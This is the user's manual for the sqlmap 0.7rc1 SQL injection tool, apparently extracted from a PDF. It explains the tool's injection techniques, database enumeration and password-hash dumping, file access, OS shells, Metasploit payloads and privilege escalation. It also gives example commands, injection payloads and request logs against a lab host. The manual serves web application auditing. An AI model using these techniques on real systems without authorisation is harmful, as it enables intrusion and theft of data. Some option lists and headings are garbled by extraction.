sqlmap user's manual

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This document is the user's manual to use sqlmap. Check the project homepage for the latest version.

Contents

1	Inti	oduction	3
	1.1	Requirements	3
	1.2	Scenario	3
	1.3	Techniques	5
2	Fea	oures	5
	2.1	Generic features	5
	2.2	Enumeration features	6
	2.3	Takeover features	7
3	Dov	vnload and update	7
4	Lice	nse and copyright	8
5	Usa	${f ge}$	8
	5.1	Output verbosity	10
	5.2	Target	14
		5.2.1 Target URL	14
		5.2.2 Parse targets from Burp or WebScarab logs	14
		5.2.3 Process Google dork results as target urls	15
		5.2.4 Load options from a configuration INI file	16
	5.3	Request	16
		5.3.1 HTTP method: GET or POST	16
		5.3.2 HTTP Cookie header	17
		5.3.3 HTTP Referer header	18
		5.3.4 HTTP User-Agent header	19
		5.3.5 Extra HTTP headers	20
		5.3.6 HTTP Basic and Digest authentications	20
		5.3.7 HTTP proxy	21
		5.3.8 Concurrent HTTP requests	22
		5.3.9 Delay in seconds between each HTTP request	22

CONTENTS 2

	5.3.10	Seconds to wait before timeout connection	22				
	5.3.11	Maximum number of retries when the HTTP connection timeouts	22				
5.4	Injection						
	5.4.1	$Testable \ parameter(s) \ \dots $	23				
	5.4.2	Force the database management system name	24				
	5.4.3	Force the database management system operating system name	25				
	5.4.4	Custom injection payload	25				
	5.4.5	Page comparison	26				
	5.4.6	Exclude specific page content	29				
5.5	Techni	ques	29				
	5.5.1	Test for stacked queries (multiple statements) support	29				
	5.5.2	Test for time based blind SQL injection	30				
	5.5.3	Test for UNION query SQL injection	31				
	5.5.4	Use the UNION query SQL injection	32				
5.6	Finger	print	35				
	5.6.1	Extensive database management system fingerprint	35				
5.7	Enume	eration	39				
	5.7.1	Banner	39				
	5.7.2	Current user	40				
	5.7.3	Current database	40				
	5.7.4	Detect if the DBMS current user is a database administrator	40				
	5.7.5	Users	41				
	5.7.6	Users password hashes	41				
	5.7.7	Users privileges	42				
	5.7.8	Available databases	44				
	5.7.9	Databases tables	45				
	5.7.10	Database table columns	47				
	5.7.11	Dump database table entries	48				
	5.7.12	Dump all databases tables entries	51				
	5.7.13	Run your own SQL statement	53				
5.8	File sy	stem access	59				
	5.8.1	Read a file from the back-end DBMS file system	59				
	5.8.2	Write a local file on the back-end DBMS file system	60				
5.9	Opera	ting system access	61				
	5.9.1	Execute an operating system command	61				
	5.9.2	Prompt for an interactive operating system shell	61				
	5.9.3	Prompt for an out-of-band shell, meterpreter or VNC	61				

1. Introduction 3

7	Δ 11 t	hor		69
6	Disc	claimer		68
		5.10.6	Clean up the DBMS by sqlmap specific UDF and tables	68
		5.10.5	Act in non-interactive mode	68
		5.10.4	Save options on a configuration INI file	65
		5.10.3	Save and resume all data retrieved on a session file	64
		5.10.2	Update sqlmap to the latest stable version	63
		5.10.1	Estimated time of arrival	62
	5.10	Miscel	laneous	62
		5.9.5	Stored procedure buffer overflow exploitation	61
		5.9.4	One click prompt for an out-of-band shell, meterpreter or VNC	61

1 Introduction

sqlmap is an open source command-line automatic SQL injection tool. Its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.

1.1 Requirements

sqlmap is developed in Python , a dynamic object-oriented interpreted programming language. This makes the tool independent from the operating system since it only requires the Python interpreter version equal or above to 2.5. The interpreter is freely downloadable from its official site . To make it even easier, many GNU/Linux distributions come out of the box with Python interpreter package installed and other Unices and MacOS X too provide it packaged in their formats and ready to be installed. Windows users can download and install the Python setup-ready installer for x86, AMD64 and Itanium too.

sqlmap relies on the Metasploit Framework for some of its post-exploitation takeover functionalities. You need to grab a copy of it from the download page. The required version is **3.2** or above.

Optionally, if you are running sqlmap on Windows, you may wish to install PyReadline library to be able to take advantage of the sqlmap TAB completion and history support functionalities in the SQL shell and OS shell. Note that these functionalities are available natively by Python standard readline library on other operating systems. You can also choose to install Psyco library to speed up the sqlmap algorithmic operations.

1.2 Scenario

Let's say that you are auditing a web application and found a web page that accepts dynamic user-provided values on GET or POST parameters or HTTP Cookie values or HTTP User-Agent header value. You now

1. Introduction 4

want to test if these are affected by a SQL injection vulnerability, and if so, exploit them to retrieve as much information as possible out of the web application's back-end database management system or even be able to access the underlying operating system.

Consider that the target url is:

```
http://192.168.1.121/sqlmap/mysql/get_int.php?id=1
```

Assume that:

```
http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=1
```

is the same page as the original one and:

```
\verb|http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=2|
```

differs from the original one, it means that you are in front of a SQL injection vulnerability in the id GET parameter of the index.php web application page which means that no IDS/IPS, no web application firewall, no parameters' value sanitization is performed on the server-side.

This is a quite common flaw in dynamic content web applications and it does not depend upon the backend database management system nor on the web application programming language: it is a programmer code's security flaw. The Open Web Application Security Project rated on 2007 in their OWASP Top Ten survey this vulnerability as the most common and important web application vulnerability, second only to Cross-Site Scripting.

Back to the scenario, probably the SQL SELECT statemenet into get_int.php has a syntax similar to the following SQL query, in pseudo PHP code:

```
$query = "SELECT [column(s) name] FROM [table name] WHERE id=" . $_REQUEST['id'];
```

As you can see, appending any other syntatically valid SQL condition after a value for id such condition will take place when the web application passes the query to the back-end database management system that executes it, that is why the condition id=1 AND 1=1 is valid (*True*) and returns the same page as the original one, with the same content and without showing any SQL error message.

Moreover, in this simple and easy to inject scenario it would be also possible to append, not just one or more valid SQL condition(s), but also stacked SQL queries, for instance something like [...]&id=1; ANOTHER SQL QUERY# if the web application technology supports stacked queries, also known as multiple statements.

Now that you found this SQL injection vulnerable parameter, you can exploit it by manipulating the id parameter value in the HTTP request.

There exist many resources on the Net explaining in depth how to prevent, how to detect and how to exploit SQL injection vulnerabilities in web application and it is recommended to read them if you are not familiar with the issue before going ahead with sqlmap.

Passing the original address, http://192.168.1.121/sqlmap/mysql/get_int.php?id=1 to sqlmap, the tool will automatically:

- Identify the vulnerable parameter(s) (id in this scenario);
- Depending on the user's options, sqlmap uses the **blind SQL injection** or the **inband SQL injection** technique as described in the following section to go ahead with the exploiting.

2. Features 5

1.3 Techniques

sqlmap implements three techniques to exploit a SQL injection vulnerability:

• Inferential blind SQL injection, also known as boolean based blind SQL injection: sqlmap appends to the affected parameter in the HTTP request, a syntatically valid SQL statement string containing a SELECT sub-statement, or any other SQL statement whose the user want to retrieve the output. For each HTTP response, by making a comparison based upon HTML page content hashes, or string matches, with the original request, the tool determines the output value of the statement character by character. The bisection algorithm implemented in sqlmap to perform this technique is able to fetch each output character with at maximum seven HTTP requests. This is sqlmap default SQL injection technique.

- UNION query (inband) SQL injection, also known as full UNION query SQL injection: sqlmap appends to the affected parameter in the HTTP request, a syntatically valid SQL statement string starting with a UNION ALL SELECT. This techique is useful if the web application page passes the output of the SELECT statement to a for cycle, or similar, so that each line of the query output is printed on the page content. sqlmap is also able to exploit partial (single entry) UNION query SQL injection vulnerabilities which occur when the output of the statement is not cycled in a for construct whereas only the first entry output is displayed. This technique is much faster if the target url is affected by because in a single HTTP response it returns the whole query output or a entry per each response within the page content. This SQL injection technique is an alternative to the first one.
- Batched (stacked) queries support, also known as multiple statements support: sqlmap tests if the web application supports stacked queries then, in case it does support, it appends to the affected parameter in the HTTP request, a semi-colon (;) followed by the SQL statement to be executed. This technique is useful to run SQL statements other than SELECT like, for instance, data definition or data manipulation statements possibly leading to file system read and write access and operating system command execution depending on the underlying back-end database management system and the session user privileges.

2 Features

Major features implemented in sqlmap include:

2.1 Generic features

- Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server back-end database management systems. Besides these four database management systems software. sqlmap can also identify Microsoft Access, DB2, Informix, Sybase and Interbase.
- Full support for three SQL injection techniques: inferential blind SQL injection, UNION query (inband) SQL injection and batched queries support. sqlmap can also test for time based blind SQL injection.
- It is possible to provide a single target URL, get the list of targets from Burp proxy requests log file path or WebScarab proxy conversations/ folder path or get the list of targets by providing sqlmap with a Google dork which queries Google search engine and parses its results page.
- Automatically tests all provided **GET** parameters, **POST** parameters, HTTP **Cookie** header values and HTTP **User-Agent** header value to find the dynamic ones, which means those that vary the

2. Features 6

HTTP response page content. On the dynamic ones sqlmap automatically tests and detects the ones affected by SQL injection. Each dynamic parameter is tested for *numeric*, *single quoted string*, *double quoted string* and all of these three datatypes with zero to two parenthesis to correctly detect which is the SELECT statement syntax to perform further injections with. It is also possible to specify the parameter(s) that you want to perform tests and use for injection on.

- Option to specify the **maximum number of concurrent HTTP requests** to speed up the blind SQL injection algorithms (multithreading). It is also possible to specify the number of seconds to wait between each HTTP request.
- HTTP Cookie header string support, useful when the web application requires authentication based upon cookies and you have such data or in case you just want to test for and exploit SQL injection on such header.
- Automatically handle **HTTP** Set-Cookie header from target url, re-establishing of the session if it expires. Test and exploit on these values is supported too.
- HTTP Basic and Digest authentications support.
- Anonymous HTTP proxy support to pass by the requests to the target URL that works also with HTTPS requests.
- Options to fake the **HTTP** Referer header value and the **HTTP** User-Agent header value specified by user or randomly selected from a text file.
- Support to increase the **verbosity level of output messages**: there exist **six levels**. The default level is **1** in which information, warnings, errors and tracebacks, if they occur, will be shown.
- Granularity in the user's options.
- Estimated time of arrival support for each query, updated in real time while fetching the information to give to the user an overview on how long it will take to retrieve the output.
- Support to save the session (queries and their output, even if partially retrieved) in real time while fetching the data on a text file and resume the injection from this file in a second time.
- Support to read options from a configuration INI file rather than specify each time all of the options on the command line. Support also to save command line options on a configuration INI file.
- Integration with other IT security related open source projects, Metasploit and w3af .
- PHP setting magic_quotes_gpc bypass by encoding every query string, between single quotes, with CHAR, or similar, database management system function.

2.2 Enumeration features

- Extensive back-end database management system software and underlying operating system fingerprint based upon inband error messages, banner parsing, functions output comparison and specific features such as MySQL comment injection. It is also possible to force the back-end database management system name if you already know it. sqlmap is also able to fingerprint the web server operating system, the web application technology and, in some circumstances, the back-end DBMS operating system.
- Basic web server software and web application technology fingerprint.

• Support to retrieve on all four back-end database management system banner, current user, current database, check if the current user is a database administrator, enumerate users, users password hashes, users privileges, databases, tables, columns, dump tables entries, dump whole database management system and run user's own SQL statement.

2.3 Takeover features

- Support to **read either text or binary files** from the database server underlying file system when the database software is MySQL, PostgreSQL and Microsoft SQL Server.
- Support to execute arbitrary commands on the database server underlying operating system when the database software is MySQL, PostgreSQL via user-defined function injection and Microsoft SQL Server via xp_cmdshell() stored procedure.
- Support to establish an out-of-band stateful connection between the attacker box and the database server underlying operating system via:
 - Stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux;
 - Microsoft SQL Server 2000 and 2005 sp_replwritetovarbin stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support;
 - SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit on the attacker box.
- Support for database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable.

3 Download and update

sqlmap 0.7 release candidate 1 version can be downloaded as a source gzip compressed file or as a source zip compressed file.

sqlmap can be downloaded from its SourceForge File List page. It is available in various formats:

- Source gzip compressed operating system independent.
- Source bzip2 compressed operating system independent.
- Source zip compressed operating system independent.
- DEB binary package architecture independent for Debian and any other Debian derivated GNU/Linux distribution.
- RPM binary package architecture independent for Fedora and any other operating system that can install RPM packages.
- Portable executable for Windows that does not require the Python interpreter to be installed on the operating system.

Whatever way you downloaded sqlmap, run it with -update option to update it to the latest stable version available on its SourceForge File List page.

You can also checkout the source code from the sqlmap Subversion repository to give a try to the development release:

\$ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

4 License and copyright

sqlmap is released under the terms of the General Public License v2 . sqlmap is copyrighted by Bernardo Damele A. G. and Daniele Bellucci .

5 Usage

```
$ python sqlmap.py -h
    sqlmap/0.7rc1
    by Bernardo Damele A. G. <bernardo.damele@gmail.com>
Usage: sqlmap.py [options]
Options:
                        show program's version number and exit
  --version
  -h, --help
                        show this help message and exit
  -v VERBOSE
                        Verbosity level: 0-5 (default 1)
 Target:
    At least one of these options has to be specified to set the source to
    get target urls from.
    -u URL, --url=URL
                        Target url
                        Parse targets from Burp or WebScarab logs
    -1 LIST
    -g GOOGLEDORK
                        Process Google dork results as target urls
    -c CONFIGFILE
                        Load options from a configuration INI file
 Request:
    These options can be used to specify how to connect to the target url.
    --method=METHOD
                        HTTP method, GET or POST (default GET)
    --data=DATA
                        Data string to be sent through POST
    --cookie=COOKIE
                        HTTP Cookie header
    --referer=REFERER
                        HTTP Referer header
    --user-agent=AGENT HTTP User-Agent header
                        Load a random HTTP User-Agent header from file
    -a USERAGENTSFILE
    --headers=HEADERS
                        Extra HTTP headers newline separated
    --auth-type=ATYPE
                        HTTP Authentication type (value Basic or Digest)
    --auth-cred=ACRED
                        HTTP Authentication credentials (value name:password)
    --proxy=PROXY
                        Use a HTTP proxy to connect to the target url
    --threads=THREADS
                        Maximum number of concurrent HTTP requests (default 1)
    --delay=DELAY
                        Delay in seconds between each HTTP request
    --timeout=TIMEOUT
                        Seconds to wait before timeout connection (default 30)
    --retries=RETRIES
                        Retries when the connection timeouts (default 3)
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and how to parse and compare HTTP
    responses page content when using the blind SQL injection technique.
```

-p TESTPARAMETER Testable parameter(s)

--dbms=DBMS Force back-end DBMS to this value

--os=OS Force back-end DBMS operating system to this value

--prefix=PREFIX Injection payload prefix string
--postfix=POSTFIX Injection payload postfix string

--string=STRING String to match in page when the query is valid
--regexp=REGEXP Regexp to match in page when the query is valid
--excl-str=ESTRING String to be excluded before comparing page contents
--excl-reg=EREGEXP Matches to be excluded before comparing page contents

Techniques:

These options can be used to test for specific SQL injection technique or to use one of them to exploit the affected parameter(s) rather than using the default blind SQL injection technique.

--stacked-test Test for stacked queries (multiple statements) support

--time-test Test for time based blind SQL injection
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
--union-test Test for UNION query (inband) SQL injection
--union-tech=UTECH Technique to test for UNION query SQL injection

--union-use Use the UNION query (inband) SQL injection to retrieve

the queries output. No need to go blind

Fingerprint:

-f, --fingerprint Perform an extensive DBMS version fingerprint

Enumeration:

These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database

--is-dba Detect if the DBMS current user is DBA

--users Enumerate DBMS users

--passwords Enumerate DBMS users password hashes (opt -U)
--privileges Enumerate DBMS users privileges (opt -U)

--dbs Enumerate DBMS databases

--start, --stop)

--dump-all DBMS databases tables entries

-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate

-U USER $$\operatorname{DBMS}$$ user to enumerate

--start=LIMITSTART First table entry to dump
--stop=LIMITSTOP Last table entry to dump
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell

File system access:

These options can be used to access the back-end database management system underlying file system.

```
Read a file from the back-end DBMS file system
--read-file=RFILE
--write-file=WFILE Write a local file on the back-end DBMS file system
--dest-file=DFILE
                   Back-end DBMS absolute filepath to write to
```

Operating system access:

This option can be used to access the back-end database management system underlying operating system.

```
--os-cmd=OSCMD
                    Execute an operating system command
--os-shell
                    Prompt for an interactive operating system shell
                    Prompt for an out-of-band shell, meterpreter or VNC
--os-pwn
--os-smbrelay
                    One click prompt for an OOB shell, meterpreter or {\tt VNC}
--os-bof
                    Stored procedure buffer overflow exploitation
--priv-esc
                    User priv escalation by abusing Windows access tokens
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
```

Miscellaneous:

the estimated time of $arrival$
test stable version
a retrieved on a session file

Save options on a configuration INI file --save --batch Never ask for user input, use the default behaviour

--cleanup Clean up the DBMS by sqlmap specific UDF and tables

5.1Output verbosity

Option: -v

Verbose options can be used to set the verbosity level of output messages. There exist six levels. The default level is 1 in which information, warnings, errors and tracebacks, if they occur, will be shown. Level 2 shows also debug messages, level 3 shows also HTTP requests with all HTTP headers sent, level 4 shows also HTTP responses headers and level 5 shows also HTTP responses page content.

Example on a MySQL 5.0.67 target (verbosity level 1):

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1
```

```
[hh:mm:12] [INFO] testing connection to the target url
[hh:mm:12] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:14] [INFO] url is stable
[hh:mm:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:14] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:14] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:14] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:14] [INFO] GET parameter 'id' is dynamic
[hh:mm:14] [INFO] testing sql injection on GET parameter 'id' with O parenthesis
[hh:mm:14] [INFO] testing unescaped numeric injection on GET parameter 'id'
[hh:mm:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[hh:mm:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[hh:mm:14] [INFO] testing for parenthesis on injectable parameter
```

```
[hh:mm:14] [INFO] the injectable parameter requires 0 parenthesis
     [hh:mm:14] [INFO] testing MySQL
     [hh:mm:14] [INFO] query: CONCAT(CHAR(53), CHAR(53))
     [hh:mm:14] [INFO] retrieved: 55
     [hh:mm:14] [INFO] performed 20 queries in 0 seconds
     [hh:mm:14] [INFO] confirming MySQL
     [hh:mm:14] [INFO] query: LENGTH(CHAR(53))
     [hh:mm:14] [INFO] retrieved: 1
     [hh:mm:14] [INFO] performed 13 queries in 0 seconds
     [hh:mm:14] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
     [hh:mm:14] [INFO] retrieved: 5
     [hh:mm:14] [INFO] performed 13 queries in O seconds
     web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
     web application technology: PHP 5.2.6, Apache 2.2.9
     back-end DBMS: MySQL >= 5.0.0
Example on a MySQL 5.0.67 target (verbosity level 2):
     $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 2
     [hh:mm:03] [DEBUG] initializing the configuration
     [hh:mm:03] [DEBUG] initializing the knowledge base
     [hh:mm:03] [DEBUG] cleaning up configuration parameters
     [hh:mm:03] [DEBUG] setting the HTTP method to GET
     [hh:mm:03] [DEBUG] creating HTTP requests opener object
     [hh:mm:03] [DEBUG] parsing XML queries file
     [hh:mm:03] [INFO] testing connection to the target url
     [hh:mm:03] [INFO] testing if the url is stable, wait a few seconds
     [hh:mm:04] [INFO] url is stable
     [hh:mm:04] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
     [hh:mm:04] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
     [hh:mm:04] [INFO] testing if GET parameter 'id' is dynamic
     [hh:mm:04] [INFO] confirming that GET parameter 'id' is dynamic
     [hh:mm:04] [INFO] GET parameter 'id' is dynamic
     [hh:mm:04] [INFO] testing sql injection on GET parameter 'id' with O parenthesis
     [hh:mm:04] [INFO] testing unescaped numeric injection on GET parameter 'id'
     [hh:mm:04] [INFO] confirming unescaped numeric injection on GET parameter 'id'
     [hh:mm:04] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
     Γ...
Example on a MySQL 5.0.67 target (verbosity level 3):
     $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 3
     [hh:mm:54] [INFO] testing connection to the target url
     [hh:mm:54] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
     Host: 192.168.1.121:80
     Accept-language: en-us, en; q=0.5
     Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
     image/png,*/*;q=0.5
     User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
```

```
Connection: close
     [...]
     [hh:mm:55] [INFO] testing MySQL
     [hh:mm:55] [INFO] query: CONCAT(CHAR(54), CHAR(54))
     [hh:mm:55] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2854%29%2C%20CHAR
     %2854%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%201104=1104 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
     Host: 192.168.1.121:80
     Accept-language: en-us, en; q=0.5
     Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
     image/png,*/*;q=0.5
     User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
     Connection: close
     [\ldots]
Example on a MySQL 5.0.67 target (verbosity level 4):
     $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 4
     [...]
     [hh:mm:44] [INFO] testing connection to the target url
     [hh:mm:44] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
     Host: 192.168.1.121:80
     Accept-language: en-us, en; q=0.5
     Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
     image/png,*/*;q=0.5
     User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
     Connection: close
     [hh:mm:44] [TRAFFIC IN] HTTP response (OK - 200):
     Date: Thu, 11 Dec 2008 hh:mm:44 GMT
     Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch
     X-Powered-By: PHP/5.2.6-2ubuntu4
     Content-Length: 119
     Connection: close
     Content-Type: text/html
     [...]
     [hh:mm:45] [INFO] testing MySQL
     [hh:mm:46] [INFO] query: CONCAT(CHAR(52), CHAR(52))
     [hh:mm:46] [TRAFFIC OUT] HTTP request:
     GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2852%29%2C%20CHAR
     %2852%29%29%29%2C%201%2C%201%29%29%20%3E%2063%20AND%203030=3030 HTTP/1.1
     Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
     Host: 192.168.1.121:80
     Accept-language: en-us, en; q=0.5
     Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
     image/png,*/*;q=0.5
     User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
     Connection: close
     Γ...1
```

Example on a MySQL 5.0.67 target (verbosity level 5):

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5
 Γ...
 [hh:mm:17] [INFO] testing connection to the target url
 [hh:mm:17] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1 HTTP/1.1
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 192.168.1.121:80
Accept-language: en-us, en; q=0.5
{\tt Accept: text/xml, application/xml, application/xhtml+xml, text/html; q=0.9, text/plain; q=0.8, text/ml, application/xml, application/xhtml+xml, text/html; q=0.9, text/plain; q=0.8, text/ml, application/xml, application/xhtml+xml, text/html; q=0.9, text/plain; q=0.8, text/ml, t
 image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
 Connection: close
 [hh:mm:17] [TRAFFIC IN] HTTP response (OK - 200):
Date: Thu, 11 Dec 2008 hh:mm:17 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4
Content-Length: 119
Connection: close
Content-Type: text/html
<html><body>
 <b>SQL results:</b>
 11tr>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>1td>
 </body></html>
 [...]
 [hh:mm:18] [INFO] testing MySQL
 [hh:mm:18] [INFO] query: CONCAT(CHAR(51), CHAR(51))
 [hh:mm:18] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int.php?id=1%20AND%20ORD%28MID%28%28CONCAT%28CHAR%2851%29%2C%20CHAR
%2851%29%29%20%201%2C%201%29%29%20%3E%2063%20AND%202581=2581 HTTP/1.1
Accept-charset: ISO-8859-15, utf-8; q=0.7, *; q=0.7
Host: 192.168.1.121:80
Accept-language: en-us, en; q=0.5
\label{lem:accept:text/xml,application/xml,application/xhtml+xml,text/html; q=0.9, text/plain; q=0.8, and text/xml, application/xml, application/xhtml+xml, text/html; q=0.9, text/plain; q=0.8, text/xml, application/xml, appli
 image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
 Connection: close
 [hh:mm:18] [TRAFFIC IN] HTTP response (OK - 200):
Date: Thu, 11 Dec 2008 hh:mm:18 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4
Content-Length: 75
 Connection: close
Content-Type: text/html
 <html><body>
<b>SQL results:</b>
 </body></html>
```

[...]

5.2 Target

At least one of these options has to be specified to set the source to get target urls from.

5.2.1 Target URL

```
Option: -u or -url
```

To run sqlmap on a single target URL.

Example on a MySQL 5.0.67 target:

```
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1"
[...]
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0
```

5.2.2 Parse targets from Burp or WebScarab logs

Option: -1

Rather than providing a single target URL it is possible to test and inject on HTTP requests proxied through Burp proxy or WebScarab proxy.

Example passing to sqlmap a WebScarab proxy conversations/ folder:

```
$ python sqlmap.py -l /tmp/webscarab.log/conversations/
[hh:mm:43] [INFO] sqlmap parsed 27 testable requests from the targets list
[hh:mm:43] [INFO] sqlmap got a total of 27 targets
[hh:mm:43] [INPUT] url 1:
GET http://192.168.1.121:80/phpmyadmin/navigation.php?db=test&token=60747016432606019619a
c58b3780562
Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3; phpMyAdmin=366c9c9b329a98eabb4b708c2df8b
d7d392eb151; pmaCookieVer=4; pmaPass-1=uH9%2Fz5%2FsB%2FM%3D; pmaUser-1=pInZx5iWPrA%3D;
pma_charset=iso-8859-1; pma_collation_connection=utf8_unicode_ci; pma_fontsize=deleted;
pma_lang=en-utf-8; pma_mcrypt_iv=o6Mwtqw6c0c%3D; pma_theme=deleted
do you want to test this url? [Y/n/q] n
[hh:mm:46] [INPUT] url 2:
GET http://192.168.1.121:80/sqlmap/mysql/get_int.php?id=1
Cookie: PPA_ID=197bf44d671aeb7d3a28719a467d86c3
do you want to test this url? [Y/n/q] y
[hh:mm:49] [INFO] testing url http://192.168.1.121:80/sqlmap/mysql/get_int.php?id=1
[hh:mm:49] [INFO] testing connection to the target url
[hh:mm:49] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:50] [INFO] url is stable
[hh:mm:50] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:50] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:50] [INFO] testing if Cookie parameter 'PPA_ID' is dynamic
[hh:mm:50] [WARNING] Cookie parameter 'PPA_ID' is not dynamic
[hh:mm:50] [INFO] testing if GET parameter 'id' is dynamic
```

```
[hh:mm:50] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:50] [INFO] GET parameter 'id' is dynamic
[hh:mm:50] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:50] [INFO] testing unescaped numeric injection on GET parameter 'id'
[hh:mm:50] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[hh:mm:50] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[hh:mm:50] [INPUT] do you want to exploit this SQL injection? [Y/n] y
[hh:mm:29] [INFO] testing for parenthesis on injectable parameter
